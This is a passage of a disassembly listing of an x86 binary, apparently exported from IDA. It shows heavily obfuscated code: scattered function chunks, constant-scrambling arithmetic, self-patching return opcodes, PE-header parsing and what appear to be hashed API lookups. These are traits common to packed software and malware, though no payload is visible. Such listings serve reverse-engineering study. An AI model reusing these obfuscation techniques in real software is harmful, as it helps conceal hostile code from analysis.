loc_457861: ; CODE XREF: sub_43CB0D+4934j
; sub_43CB0D:loc_450AD6j
push offset sub_453E5C
jmp loc_44A712
; END OF FUNCTION CHUNK FOR sub_43CB0D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_424. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BDF1
loc_45786C: ; CODE XREF: sub_44BDF1+10j
jmp loc_43BD63
; END OF FUNCTION CHUNK FOR sub_44BDF1
; ---------------------------------------------------------------------------
push ebx
push 22519BABh
pop ebx
and ebx, 0D07FDDC7h
jmp loc_4480E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F57E
loc_457883: ; CODE XREF: sub_44F57E-948Bj
xor ecx, ebx
pop ebx
add ecx, 67EA0BEh
jz loc_456D65
shl ebx, 5
sbb ecx, 9EEEE00Dh
jmp loc_455069
; END OF FUNCTION CHUNK FOR sub_44F57E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_242. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4448D7
loc_4578A1: ; CODE XREF: sub_4448D7:loc_43BCFAj
mov esi, edx
xchg esi, [esp+0]
call sub_45341C
mov eax, 203AE851h
jmp loc_45A429
; END OF FUNCTION CHUNK FOR sub_4448D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_4578B5: ; CODE XREF: sub_4549F0-1492Ej
mov eax, 22143682h
call sub_43AA94
mov ds:dword_41D168, eax
lea eax, nullsub_10
mov byte ptr [eax], 0C3h
jmp nullsub_10
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4593AA
loc_4578D3: ; CODE XREF: sub_4593AA-1C838j
jns loc_455AAA
; END OF FUNCTION CHUNK FOR sub_4593AA
; START OF FUNCTION CHUNK FOR sub_457453
loc_4578D9: ; CODE XREF: sub_457453+7j
jmp loc_459266
; END OF FUNCTION CHUNK FOR sub_457453
; ---------------------------------------------------------------------------
shr esi, 16h
pop ebx
test edi, eax
jmp loc_455AA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443C4A
loc_4578E9: ; CODE XREF: sub_443C4A:loc_4402D3j
jz loc_453DF3
jmp loc_45699E
; END OF FUNCTION CHUNK FOR sub_443C4A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_4578F4: ; CODE XREF: sub_44602A+A24Cj
cmp byte ptr [eax], 0F1h
jnz loc_452EF6
jmp loc_444393
; END OF FUNCTION CHUNK FOR sub_44602A
; =============== S U B R O U T I N E =======================================
sub_457902 proc near ; DATA XREF: sub_459760-191D4o
xor eax, 4F267AA8h
push offset sub_45A79F
jmp nullsub_390
sub_457902 endp
; ---------------------------------------------------------------------------
loc_457912: ; CODE XREF: ut7h7i2x:loc_44FAF5j
push offset loc_43A3DC
jmp locret_44239E
; ---------------------------------------------------------------------------
mov [eax], ecx
xchg eax, edi
jmp sub_451900
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439FD5
loc_457925: ; CODE XREF: sub_439FD5+16892j
add ebx, 60986950h
jz sub_43BE93
jmp loc_44CEB6
; END OF FUNCTION CHUNK FOR sub_439FD5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_457936: ; CODE XREF: sub_43B7F7:loc_43F3F8j
add esi, 465A05DBh
loc_45793C: ; CODE XREF: sub_43B7F7:loc_446F71j
; ut7h7i2x:0044A75Fj ...
jmp loc_4483CA
; ---------------------------------------------------------------------------
loc_457941: ; CODE XREF: sub_43B7F7+126FCj
; sub_439BD1+15160j
pop ecx
pop ebp
jmp loc_445F81
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
loc_457948: ; CODE XREF: ut7h7i2x:004492FCj
mov ebp, 5EFFD9B8h
xchg edi, ebx
and eax, 0DFF30361h
; START OF FUNCTION CHUNK FOR sub_45A83C
loc_457955: ; CODE XREF: sub_45A83C-1ED37j
sub esi, 92E914A0h
jmp loc_452B4A
; END OF FUNCTION CHUNK FOR sub_45A83C
; ---------------------------------------------------------------------------
loc_457960: ; CODE XREF: ut7h7i2x:0044ECC3j
or edx, 935DE02Dh
; START OF FUNCTION CHUNK FOR sub_44B01F
loc_457966: ; CODE XREF: sub_44B01F+3C96j
add ecx, 87EF7529h
xchg ecx, [esp+8+var_8]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_44B01F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_452. PRESS KEYPAD "+" TO EXPAND]
db 84h, 59h, 0Ch
dd 8B5AFFFFh, 0E8522404h, 0FFFF5F64h, 0B060E7B8h, 3106E8FFh
dd 69E9FFFEh
db 2Ah, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44081E
loc_457993: ; CODE XREF: sub_44081E+9C79j
shr eax, 4
push offset sub_459D0E
jmp loc_4580C5
; END OF FUNCTION CHUNK FOR sub_44081E
; ---------------------------------------------------------------------------
loc_4579A0: ; CODE XREF: ut7h7i2x:00459D7Fj
jno loc_440529
or edi, eax
shl edx, 18h
loc_4579AB: ; CODE XREF: ut7h7i2x:loc_45423Bj
add ebx, 5F9C39A2h
xor ebx, 3D3B36DDh
jmp loc_44B61F
; ---------------------------------------------------------------------------
loc_4579BC: ; DATA XREF: sub_439D5C+393Do
xchg esi, [esp]
push 6C15560Eh
xchg ebp, [esp]
mov eax, ebp
pop ebp
jmp loc_442DAE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A25C
loc_4579CF: ; CODE XREF: sub_45A25C:loc_446E93j
mov ecx, edi
pop edi
rol ecx, 0Eh
xor ecx, 38109856h
and ecx, 6DF3D942h
or ecx, 82A6904Ch
xor ecx, 1C0D20A6h
add eax, ecx
jmp loc_44EA42
; END OF FUNCTION CHUNK FOR sub_45A25C
; ---------------------------------------------------------------------------
push offset loc_446290
loc_4579F9: ; CODE XREF: ut7h7i2x:loc_458BD5j
jmp locret_44D4F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_4579FE: ; CODE XREF: sub_44B5CF-7508j
jnb loc_459E23
and ecx, edi
xchg ebp, [ecx]
jmp loc_43DB3E
; END OF FUNCTION CHUNK FOR sub_44B5CF
; =============== S U B R O U T I N E =======================================
sub_457A0D proc near ; DATA XREF: sub_44C791:loc_44170Eo
; FUNCTION CHUNK AT 0043FA83 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00441A1D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00443CAE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B702 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044F44F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00453317 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00454F81 SIZE 00000005 BYTES
call sub_452B4F
test al, al
jz loc_441A1D
jmp loc_443CAE
sub_457A0D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B526
loc_457A1F: ; CODE XREF: sub_44B526:loc_44B52Fj
xor eax, eax
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_45418A
mov eax, [ebp-4]
add eax, 3Ch
mov eax, [eax]
add eax, [ebp-4]
jmp loc_4411EE
; END OF FUNCTION CHUNK FOR sub_44B526
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439701
loc_457A3E: ; CODE XREF: sub_439701+20BC5j
test esi, ecx
jmp loc_439400
; END OF FUNCTION CHUNK FOR sub_439701
; =============== S U B R O U T I N E =======================================
sub_457A45 proc near ; DATA XREF: sub_44F000+42C9o
; FUNCTION CHUNK AT 0044BE64 SIZE 00000005 BYTES
xchg edx, [esp+0]
mov esi, edx
pop edx
cmp dword ptr [ebp-10h], 0
jz loc_44DB32
jmp loc_44BE64
sub_457A45 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B27
loc_457A5A: ; CODE XREF: sub_439B27+5695j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_439B27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4512E6
loc_457A5C: ; CODE XREF: sub_4512E6+2317j
jmp loc_45AD04
; END OF FUNCTION CHUNK FOR sub_4512E6
; ---------------------------------------------------------------------------
loc_457A61: ; CODE XREF: ut7h7i2x:004486B2j
jmp loc_43A5AF
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_457A66 proc near ; CODE XREF: sub_449EE1-62B1p
; sub_452C66-5583p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00439D00 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043A883 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043AE8B SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0043AE9C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043B2E5 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043B8AE SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043B8F8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043B98F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BE70 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043CBE2 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043D5B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E7C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EEEE SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00440CA8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00441E16 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004426AC SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00442C17 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443113 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00443CD7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004440AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004445A5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00444D36 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00444E8E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00445E0E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446057 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044661B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004467FE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00447D26 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044827E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00448D4F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004491FD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004496BC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00449962 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044B519 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044B8CC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C2E2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D52A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D7F4 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044DA6B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044DCBC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044E46B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F147 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044F956 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044FD31 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450845 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00450D6E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045119B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045179E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045235C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452F23 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452FDE SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045315E SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00453CF2 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00453F4A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00454DD5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454F91 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045715E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045744E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045803F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004581D3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00459DBC SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045A902 SIZE 00000005 BYTES
push ebp
mov ebp, esp
push ecx
jmp loc_44FD31
sub_457A66 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_320. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A25C
loc_457A70: ; CODE XREF: sub_45A25C+1Dj
jmp loc_43BDC3
; END OF FUNCTION CHUNK FOR sub_45A25C
; =============== S U B R O U T I N E =======================================
sub_457A75 proc near ; DATA XREF: ut7h7i2x:loc_446BD1o
lea eax, nullsub_5
mov byte ptr [eax], 0C3h
jmp nullsub_5
sub_457A75 endp
; ---------------------------------------------------------------------------
push eax
push offset loc_4421B8
jmp loc_450082
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459111
loc_457A8E: ; CODE XREF: sub_459111-3DF4j
jg loc_44C643
cmp edx, esi
jmp loc_43C344
; END OF FUNCTION CHUNK FOR sub_459111
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_457A9B: ; CODE XREF: sub_44445F:loc_44FA22j
pop edi
add edi, 0E6A51FC2h
rol edi, 18h
and edi, 9B3D92E4h
add edi, 92551C95h
jmp loc_4449F9
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
locret_457AB6: ; CODE XREF: ut7h7i2x:0043F5F0j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4445DC
loc_457AB7: ; CODE XREF: sub_4445DC+15E9Bj
jmp nullsub_430
; END OF FUNCTION CHUNK FOR sub_4445DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A4D
loc_457ABC: ; CODE XREF: sub_444A4D+14B5Fj
jmp loc_4544A5
; END OF FUNCTION CHUNK FOR sub_444A4D
; ---------------------------------------------------------------------------
loc_457AC1: ; CODE XREF: ut7h7i2x:00439EFBj
or edi, esi
test ecx, 16147617h
jmp loc_446DAF
; ---------------------------------------------------------------------------
add edi, 0FE3D4620h
xchg edi, [esp]
jmp sub_454196
; ---------------------------------------------------------------------------
loc_457ADC: ; CODE XREF: ut7h7i2x:004465EDj
adc edi, eax
; =============== S U B R O U T I N E =======================================
sub_457ADE proc near ; CODE XREF: sub_4544E6+3F65p
xchg eax, [esp+0]
pop eax
pop ebp
retn
sub_457ADE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_457AE4: ; CODE XREF: ut7h7i2x:004449E4j
jmp sub_450F2A
; ---------------------------------------------------------------------------
loc_457AE9: ; CODE XREF: ut7h7i2x:00439529j
and edi, 916354CBh
; =============== S U B R O U T I N E =======================================
sub_457AEF proc near ; CODE XREF: sub_4529E0:loc_450FAEp
var_4 = dword ptr -4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043F9A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FD4D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044335C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00448C73 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044CDCB SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045953A SIZE 0000001A BYTES
xchg ecx, [esp+4+var_4]
pop ecx
xor eax, 0E38A8A42h
ror eax, 1Fh
xor eax, 861B1CF2h
jmp loc_448C73
sub_457AEF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_457B07: ; CODE XREF: sub_44F43B-146j
test edx, 10000000h
jmp loc_43AFC1
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
mov ds:off_41D100, eax
lea eax, loc_457D7B
mov byte ptr [eax], 0C3h
loc_457B21: ; CODE XREF: ut7h7i2x:loc_439F50j
jmp loc_44EE2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4518D7
loc_457B26: ; CODE XREF: sub_4518D7:loc_457D7Bj
pop edx
mov eax, [esp-8+arg_4]
jmp loc_455F65
; END OF FUNCTION CHUNK FOR sub_4518D7
; ---------------------------------------------------------------------------
and eax, 0C3FD5FE2h
not edx
jmp sub_44B526
; ---------------------------------------------------------------------------
shr edx, 18h
jmp sub_453D5B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_457B44: ; CODE XREF: sub_43D021:loc_44936Dj
xchg ebx, [edx]
sbb edx, ebp
mov [edx], ebx
loc_457B4A: ; CODE XREF: sub_44F738:loc_44B2CDj
jmp loc_452739
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4445DC
loc_457B4F: ; CODE XREF: sub_4445DC+3E5Cj
imul byte ptr [edx]
cmp al, 0A4h
jz loc_446C23
jmp loc_4409F3
; END OF FUNCTION CHUNK FOR sub_4445DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F9A
loc_457B5E: ; CODE XREF: sub_446F9A:loc_452E28j
jz loc_458445
jmp loc_43A763
; END OF FUNCTION CHUNK FOR sub_446F9A
; ---------------------------------------------------------------------------
loc_457B69: ; CODE XREF: ut7h7i2x:00454CBFj
mov byte ptr [eax], 0C3h
jmp loc_445328
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A907
loc_457B71: ; CODE XREF: sub_45A907j
pop edx
mov eax, [esp-4+arg_0]
push ecx
push edx
pop ecx
xchg ecx, [esp+0]
jmp loc_458D52
; END OF FUNCTION CHUNK FOR sub_45A907
; ---------------------------------------------------------------------------
not eax
jmp sub_455CD8
; =============== S U B R O U T I N E =======================================
sub_457B87 proc near ; CODE XREF: sub_446F56-4ADCp
; ut7h7i2x:0044C47Bj
arg_0 = dword ptr 4
xchg ecx, [esp+0]
pop ecx
mov eax, [esp-4+arg_0]
push edi
mov edi, edx
xchg edi, [esp+0]
jmp loc_43B110
sub_457B87 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CBB
loc_457B99: ; CODE XREF: sub_458CBB-B1DEj
jz loc_450A84
adc eax, edi
mov edi, 0CFAB0F5Bh
ror ecx, 17h
jmp loc_453874
; END OF FUNCTION CHUNK FOR sub_458CBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_457BAE: ; CODE XREF: sub_439AE7+1916Ej
mov ebx, 920B1AB1h
mov [ebp+0], ebx
loc_457BB6: ; CODE XREF: sub_439AE7:loc_450461j
push ecx
push 540EE78Fh
pop ecx
jmp loc_45220B
; END OF FUNCTION CHUNK FOR sub_439AE7
; =============== S U B R O U T I N E =======================================
sub_457BC2 proc near ; CODE XREF: ut7h7i2x:0043F86Bj
; ut7h7i2x:00448A31p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043D263 SIZE 0000000A BYTES
xchg esi, [esp+0]
pop esi
add edi, 3677C0E7h
xchg edi, [esp-4+arg_0]
lea eax, [ebp-2C8h]
push eax
push 4C91A0h
jmp loc_43D263
sub_457BC2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B83C
loc_457BE0: ; CODE XREF: sub_43B83C:loc_452C21j
push esi
mov esi, ebp
xchg esi, [esp+4+var_4]
mov ebp, esp
push ecx
mov esp, ebp
xchg edi, [esp+4+var_4]
mov ebp, edi
jmp loc_458A77
; END OF FUNCTION CHUNK FOR sub_43B83C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455807
loc_457BF5: ; CODE XREF: sub_455807+20j
pop edx
xor edx, 0DF54A50h
rol edx, 2
xor edx, 0CC610FDEh
add edx, ebp
add edx, 56D90B01h
call sub_443C4A
; END OF FUNCTION CHUNK FOR sub_455807
; START OF FUNCTION CHUNK FOR sub_45459E
loc_457C12: ; CODE XREF: sub_45459E+Ej
jmp loc_45A0E4
; END OF FUNCTION CHUNK FOR sub_45459E
; ---------------------------------------------------------------------------
loc_457C17: ; CODE XREF: ut7h7i2x:0044D127j
jmp loc_442EF5
; ---------------------------------------------------------------------------
loc_457C1C: ; CODE XREF: ut7h7i2x:00456AA2j
shr esi, 1
; =============== S U B R O U T I N E =======================================
sub_457C1E proc near ; CODE XREF: sub_4464B7-2203p
; FUNCTION CHUNK AT 0044487B SIZE 00000006 BYTES
xchg ecx, [esp+0]
pop ecx
add eax, ebp
add eax, 0A70D5A1Dh
mov eax, [eax]
jmp loc_44487B
sub_457C1E endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_287. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_457C32: ; CODE XREF: ut7h7i2x:00442D71j
add edi, 458F4F2Ah
sub eax, edi
pop edi
rol eax, 9
jmp loc_43A473
; ---------------------------------------------------------------------------
loc_457C43: ; CODE XREF: ut7h7i2x:0045ABFEj
test eax, 800000h
jmp loc_4541AD
; ---------------------------------------------------------------------------
loc_457C4E: ; CODE XREF: ut7h7i2x:00454CD8j
xor edx, edx
mov dl, [ebp-9]
shr edx, cl
or eax, edx
mov edx, [ebp-8]
call sub_4438BC
loc_457C5F: ; CODE XREF: ut7h7i2x:00453F0Cj
jmp loc_4422DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B122
loc_457C64: ; CODE XREF: sub_44B122+1DFFj
jmp loc_440596
; END OF FUNCTION CHUNK FOR sub_44B122
; ---------------------------------------------------------------------------
jmp ds:dword_41D164
; ---------------------------------------------------------------------------
loc_457C6F: ; CODE XREF: ut7h7i2x:0045A1FCj
jmp loc_44CF4B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_23. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
sbb dword ptr [ecx], 87FFFE73h
sbb al, 24h
mov edx, ebx
pop ebx
mov eax, [esp]
push edx
call sub_4396F5
jmp loc_4447DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439D5C
loc_457C8E: ; CODE XREF: sub_439D5C:loc_44F359j
jge loc_442F2F
; END OF FUNCTION CHUNK FOR sub_439D5C
; START OF FUNCTION CHUNK FOR sub_44C791
loc_457C94: ; CODE XREF: sub_44C791-DFC6j
jmp loc_43E663
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
mov esi, 0E0E29108h
cmp ebx, 465535C4h
jmp loc_448B2B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4443DE
loc_457CA9: ; CODE XREF: sub_4443DE:loc_451BF7j
rol eax, 1Eh
test eax, 800000h
jmp loc_44C58B
; END OF FUNCTION CHUNK FOR sub_4443DE
; ---------------------------------------------------------------------------
loc_457CB7: ; CODE XREF: ut7h7i2x:00452E58j
pop ebx
; =============== S U B R O U T I N E =======================================
sub_457CB8 proc near ; CODE XREF: sub_43FFB1+1848Cp
xchg edi, [esp+0]
pop edi
loc_457CBC: ; CODE XREF: ut7h7i2x:0043FBCEj
mov [esi], eax
push offset loc_45AB3A
jmp nullsub_513
sub_457CB8 endp
; ---------------------------------------------------------------------------
loc_457CC8: ; DATA XREF: ut7h7i2x:loc_4390C9o
mov edx, 0A22F8A70h
call sub_44B8F8
mov ds:dword_43E350, eax
call sub_453D8B
mov edx, 0A2CD59D9h
call sub_44B8F8
jmp loc_4518F6
; ---------------------------------------------------------------------------
loc_457CEB: ; DATA XREF: sub_441AED-88E7o
xchg eax, [esp]
push 0F17EB65Ch
xchg edi, [esp]
mov edx, edi
pop edi
add edx, 0A8F7AA93h
xor edx, 0AD84670Eh
jmp loc_451933
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EDD8
loc_457D0A: ; CODE XREF: sub_43EDD8+D31j
jl loc_44981F
; END OF FUNCTION CHUNK FOR sub_43EDD8
; START OF FUNCTION CHUNK FOR sub_439170
loc_457D10: ; CODE XREF: sub_439170+B098j
jmp loc_45A63A
; END OF FUNCTION CHUNK FOR sub_439170
; ---------------------------------------------------------------------------
mov ebx, ecx
jmp loc_4430A6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_211. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_457D1D: ; CODE XREF: ut7h7i2x:0044CE45j
jmp loc_45166D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458345
loc_457D22: ; CODE XREF: sub_458345-D46Dj
jmp loc_44D385
; END OF FUNCTION CHUNK FOR sub_458345
; ---------------------------------------------------------------------------
loc_457D27: ; CODE XREF: ut7h7i2x:00450EA2j
pop edx
add edx, 4091531Eh
loc_457D2E: ; CODE XREF: ut7h7i2x:loc_443810j
rol edx, 6
or edx, ds:4000FBh
jmp loc_443C82
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CED
loc_457D3C: ; CODE XREF: sub_448CED-8494j
jz loc_452849
loc_457D42: ; CODE XREF: sub_45974E+Bj
jmp loc_44415A
; END OF FUNCTION CHUNK FOR sub_448CED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444374
loc_457D47: ; CODE XREF: sub_444374+140FBj
jmp loc_4535CF
; END OF FUNCTION CHUNK FOR sub_444374
; ---------------------------------------------------------------------------
jge loc_443F23
jmp loc_45283B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ABD1
loc_457D57: ; CODE XREF: sub_43ABD1+Cj
push offset sub_43DB21
jmp nullsub_313
; END OF FUNCTION CHUNK FOR sub_43ABD1
; ---------------------------------------------------------------------------
jmp ds:off_41D100
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5AB
loc_457D67: ; CODE XREF: sub_44E5AB+7703j
jmp loc_43F956
; END OF FUNCTION CHUNK FOR sub_44E5AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_457D6C: ; CODE XREF: sub_44C791+6D92j
jmp loc_44B114
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CD2
loc_457D71: ; CODE XREF: sub_458CD2-14064j
jmp loc_4484D7
; END OF FUNCTION CHUNK FOR sub_458CD2
; ---------------------------------------------------------------------------
loc_457D76: ; CODE XREF: ut7h7i2x:0043FADCj
jmp loc_44EAEE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4518D7
loc_457D7B: ; CODE XREF: sub_442AD1:loc_43F63Cj
; sub_4518D7:loc_44A06Fj ...
jz loc_457B26
pop edx
mov eax, [esp-0Ch+arg_8]
push edx
call sub_456520
mov eax, 0DD5E106Fh
push ecx
jmp loc_4582B9
; END OF FUNCTION CHUNK FOR sub_4518D7
; ---------------------------------------------------------------------------
loc_457D96: ; CODE XREF: ut7h7i2x:00448E02j
push 796691A7h
pop eax
rol eax, 0Ah
xor eax, 291E3935h
and eax, 0C053A3F0h
jmp loc_452F1E
; ---------------------------------------------------------------------------
loc_457DB0: ; DATA XREF: sub_444851-3C6Do
push ecx
push 298B46EEh
pop ecx
xor ecx, 0F86AB8A1h
and ecx, 21C7E3C6h
xor ecx, 0D50E6786h
jmp loc_455AC4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444266
loc_457DCE: ; CODE XREF: sub_444266+6j
push ecx
mov [ebp-4], eax
call sub_456397
loc_457DD7: ; CODE XREF: sub_44F43B-3781j
jmp loc_44BE26
; END OF FUNCTION CHUNK FOR sub_444266
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44124A
loc_457DDC: ; CODE XREF: sub_44124A-6710j
jmp loc_44C4AB
; END OF FUNCTION CHUNK FOR sub_44124A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_558. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_457DE2: ; CODE XREF: sub_44C791:loc_43B6BCj
mov ecx, 0A8526A29h
jmp loc_4559A3
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B513
loc_457DEC: ; CODE XREF: sub_43B513+8j
jnz loc_43E41C
jmp loc_4533AF
; END OF FUNCTION CHUNK FOR sub_43B513
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441924
loc_457DF7: ; CODE XREF: sub_441924+17D08j
jz loc_4577E1
mov ebp, ebx
; END OF FUNCTION CHUNK FOR sub_441924
; START OF FUNCTION CHUNK FOR sub_439BF8
